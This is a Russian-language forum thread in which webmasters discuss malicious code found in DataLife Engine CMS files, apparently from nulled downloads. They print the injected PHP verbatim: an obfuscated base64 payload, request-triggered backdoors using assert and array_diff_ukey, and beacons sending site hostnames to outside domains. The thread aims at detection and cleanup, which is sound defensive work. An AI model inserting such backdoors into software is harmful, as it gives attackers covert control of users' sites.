Вопрос? Вшитая реклама в 13.3

.

 

Не знаю как сейчас, но раньше ходили слухи что он крыса.

 

Впервые об этом слышу, ты его с кем то перепутал скорее всего)

 

Та вроде byroot нармальный чел, мне на форуме не раз давал дельные советы. ТЗ тебе без труда можно узнать, в ДЛЕ бяка была или нет. У тебя же архив ДЛехи остался, посмотри в нем и будеш знать наверняка.
На счет взломов, часто встречаю в последнее время, что людих втихаря ломают, админы даже не замечают этого... Делайте жеще пароли, меня самого не раз брутили, но пронесло кажись. Вся сложность в том, что даже после взлома, можно не зать, какие файлы открывал злоумышленник.

 

Неа,с дле 13.1 не надо иметь фтп доступ

 

совпадение или нет (решать только вам) - этот код не редко появляется, после переезда на inferno, когда перенос сайта делает их ТП.
Вот список файлов и кодов которые появляются:
1. engine\classes\mysql.php и engine/data/dbcofig.php

PHP:

$liciens = "@Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6VVHtv2zYQ/yoOYIQS4sgP2bEdQ2jWwtiCDe2WJiuG1hAo6SyxkkiVDztB6e++oxwsceF52B+84+OeP95dN5EQkZh0AhIb5RjI9uAIy8hiW7AKvHAwn1864jcSNl63EKq3J0ayXleu/QVbe0wp0F43fvfhw6+3y89dtL3y/e83eJsKUTLw3FXvUOBi2NOsBs+/mE3mk2mP9Im/2KE17+ZQMIrIfDSeDsLZkPhC/uvzdHb6eX7yeTYgR0ImV+P5aDCeTa7C+WSMZDYPB5PZ+Go8C+djciSDroR1hE4+Lu/+XN59Vlo64JBpYZoGpEeYNLFWYL4h4r6/WjgoX2mQu+UfD8uP9/HD3S1ZLW4c3NEpe1qJIm60Lp6tldtmXRpalZvHlG8Kk1TRcDqYYGT/EZgEjB3kiy1vPB5d4roIZ6PhpSP+m1Qo7/nzYf1PGfQcWv51rWNJeeb0eqPhIPQXBdAMbT97I+EblqdBU2tXZn3FCt13uzKFIm2v0jRwPJfCsctw2972r5tWQxeday5Yu6WtgviN+MjOFYi2fhF8ZJJujayApyLDj8QqdSINlbQGDTL60i3haStkhmp4UHBuZDREvSOgRK9ROUdYfrBOCq2b675Lw/0UUhT3/QU8Mr3YdY3KT4OuOeQ0lqDMqz/83z/VfcyrhjdfqfmmYGsaHREliOtN7+ylsn65v/89fsBT/NPPy/f3ZOUa4sQzNkfbM2fY/HlcU50WHuknlGXGpgiBRSQqsJ/Cd7FdVprecvspB22xBODRMhpTmRaWFkJYltfUvhXaNgzrwdI6QcW/6FsptlaIHA8JPtaUVUGfkZ7Dzcd+xAQOfLeWg72ctKIMpLGbMkjF3khgM5OWblklcmGsKoCjY043zqmognTvWtot01gKlnGlaY5RcXfap2a0SQBpkDzt4xYZF6U1lcjtmqaQiMAqaHN7cslhPIqjZVWzkZVJGtiE8XyfB9Zem8VhGk2QYOIKPaqnOhHK8kwKltmaZY0FyUB96VwNbKHT2IoEB7H9OqrBoiyjHKU4s00hOLxA5bru7Ic5TLIKcLhjneBAXx2XeZ7V7dNBiBHNMg5bZbEBcqYcOtEaIEsoghtVDl1tkTEeNEVjaVa/3qGCpJoJvo9Qsr0Lt+ucRR03KY8M2+dBPT02V3e73d+Pxjob')));";$release_this = "cre"."ate_"."function";@$dle_func = $release_this('', "$liciens;");$dle_func('');

2. engine\inc\addnews.php

PHP:

$serv = $_SERVER[HTTP_HOST];if (($serv != 'localhost') and ($serv != '127.0.0.1') and (strpos($serv, '.') != false))
    {$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."14."."0_".$serv;};

PHP:

$fi = 'fi'.'le';$up_times = trim(@implode ('', @$fi($serv_time)));

3. engine\modules\calendar.php

PHP:

$reg_data = $_REQUEST['captchas'];$reg_base = $_REQUEST['recaptchas'];

PHP:

$recaptcha_get_signup_id  = 'eb516e7d7a6462a6d531ec65dcf1d599';

PHP:

$setel = 'a'.'sse'.'rt';if(md5($reg_data)==$recaptcha_get_signup_id) {@$setel(stripslashes($reg_base));}

4. engine\modules\feedback.php

PHP:

    $syskey=strrev('edoce'); $pubkeys=strrev('d_46esab'); $captchacrypt=$pubkeys.$syskey;

PHP:

$sert = $_SERVER[HTTP_HOST];if (($sert != 'localhost') and ($sert != '127.0.0.1') and (strpos($sert, '.') != false))
            {$capt = 'f'.'ile';@$capt($captchacrypt('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTE0LjBf').$sert);}

5. engine\modules\functions.php

PHP:

   $news_num = @$_REQUEST['numer'];
   $bannermass = @$_REQUEST['bannerid'];

PHP:

$check_newsnum = @$_REQUEST['newsnum'];
                            $check_category = @$_REQUEST['category'];

PHP:

$get_url_var = '82432564';

PHP:

$set_cookie = '_di'.'ff_';$set_cookie='ar'.'ray'.$set_cookie.'ukey';//globils

PHP:

      if($bannermass==$get_url_var){
      if (@strpos($check_newsnum, 'creat')=== false){
         @$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes($check_category) => 2), @$check_newsnum);}else{
         @$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes('}'.$check_category.'//') => 2), @$check_newsnum);}}//chekings 

В общем в ДЛЕ 13+ лучшим удалением этой заразы - залить файлы от оригинала, т.к. все правки делаются через плагины, так же после настройки всех плагинов лучше выполнить рекомендацию:

ну и не забываем так же сменить все пароли.

 

byroot у меня тоже самое было на 3х сайтах, тоже на inferno.
Помогло обновление DLE до последний версии.

Ещё тут /public_html/uploads/fotos всегда появлились файлы .jpeq

 

Может тогда нужно съезжать с инферно нафиг?

 

в /uploads/fotos/.htaccess удалите строку

Код:

AddHandler application/x-httpd-php .avi .jpeq .mpg4

чтобы код расширений .avi .jpeq .mpg4 как php не исполнялся.
Кста, я тоже на инферно, но сомневаюсь, что это сделали они.

 

PunPun просто много сайтов лечил от вирусов после переезда на Инферно, и всегда после этого переезда сайты метку в яше получали. Наверное если самому перенос делать, то всё норм будет, а через них - ловите вап. Был бы это единичный случай, а так получается это очень часто при переезде на Инферно через их ТП потом появляется левый код в файлах движка.

Я сам на зомро уже года 4 наверное, и там меня всё устраивает, главное - правильно всё настроить и оптимизировать

 

Конкретно код в этих файлах есть в скаченных дистрибутивах с сайта dlepavilion.com, есть в версии 11.1 и скачал свежую 14 в ней так же есть данный код. Так что его добавляет точно не хостинг, а люди сами уже ставят двиг с этой заразой.

 

TeraMoune обычно с ньютеплатес или провеббер версию дле ставят, я проверил вчера только mysql.php, и ни в нулледе ни в оригинале левого кода небыло. Кто вообще знает что за сайт длепавильон? Я о нем слышу впервые. Причем в теме выше написано, что была чистая дле, которую выкладываю я, и после переноса появился данный левый код. И везде Инферно!

 

Ну вот иногда люди качают не на провебере или где-то там еще, а просто тыкают куда попало. Как и я когда скачивал мне было не важно откуда, главное скачать и проверить модуль под нужную версию.

Если вбить в гугле dle 10.1 nulled то данный сайт занимает 6 позицию результата. Да на некоторых экранах стоит пролистать но вот я почему-то пару раз скачал именно от туда двиг.
Что и повторил перед написанием сообщения дабы убедиться, что код я видел именно в движке скаченном с того сайта.

 

del

 

Felix10, эти скачай,

Спойлер: dle11.1_nulled.zip

DataLife Engine v.11.1 Final Release и DLE 11.1 nulled
Тут есть.
В engine/inc/addnews.php

PHP:

$up_times = trim(@implode ('', @file($serv_time)));

PHP:

$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."11."."1_".$_SERVER[HTTP_HOST];

В engine/modules/feedback.php

PHP:

$syskey=strrev('edoce'); $pubkeys=strrev('d_46esab'); $captchacrypt=$pubkeys.$syskey;

PHP:

@file($captchacrypt('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTExLjFf').$_SERVER[HTTP_HOST]);

Спойлер: dle14_0_nulled.zip

DLE 14.0 nulled и оригинал
Тут есть
В engine/inc/addnews.php

PHP:

$fi = 'fi'.'le';$up_times = trim(@implode ('', @$fi($serv_time)));

PHP:

$serv = $_SERVER[HTTP_HOST];if (($serv != 'localhost') and ($serv != '127.0.0.1') and (strpos($serv, '.') != false))
{$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."14."."0_".$serv;};


В engine/modules/calendar.php

PHP:

$reg_data = $_REQUEST['captchas'];$reg_base = $_REQUEST['recaptchas'];

PHP:

$setel = 'a'.'sse'.'rt';if(md5($reg_data)==$recaptcha_get_signup_id) {@$setel(stripslashes($reg_base));}

В engine/modules/feedback.php

PHP:

$syskey=strrev('edoce'); $pubkeys=strrev('d_46esab'); $captchacrypt=$pubkeys.$syskey;


PHP:

$sert = $_SERVER[HTTP_HOST];if (($sert != 'localhost') and ($sert != '127.0.0.1') and (strpos($sert, '.') != false))
{$capt = 'f'.'ile';@$capt($captchacrypt('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTE0LjBf').$sert);}


Код может быть не точной копией как написал, byroot, он в разных движках отличается.

Скачал еще других версии и подобная шляпа происходит еще с 9.8 только домен иногда разный и сам код тоже не всегда точь в точь

PHP:

$dates = "ht"."tp:/"."/vkoh"."tak"."tu"."."."ru/clu"."b2801991.p"."hp?data=dle9.8_".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];

PHP:

$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."1"."0.0_d"."lep_".$_SERVER[HTTP_HOST];

 

у меня что в гугле, что в яндексе на первом месте стоит ньютемплатес, скачал только что, и кроме вшитых ссылок в нем нет ничего, например:


все остальные файлы без изменений. но я проверял не нулл версию, а якобы оригинал ДЛЕ.

 

byroot, Я же ничего о первой позиции не написал, я написал что не все качают с первого результата.
Да и приведённый в пример код найденных файлах я думаю не имеет отношения к рекламе. Это скорей информер, может с целью статистики может с целью знать где и кто поставил себе дырявый нулл в котором может быть возможности доступа для постороннего ( как правило для того кто и оставлял всюду эти маячки )

 

фильмы тоже смотрят не с первого результата, если в первом месте стоит сайт с плеером нормальным? не знаю никого, чтобы кто-то топ-3 топ-5 топ-10 пролистывал дальше и качал или смотрел не в первой десятке. если в первом сайте выдачи можно скачать - зачем идти на остальные сайты?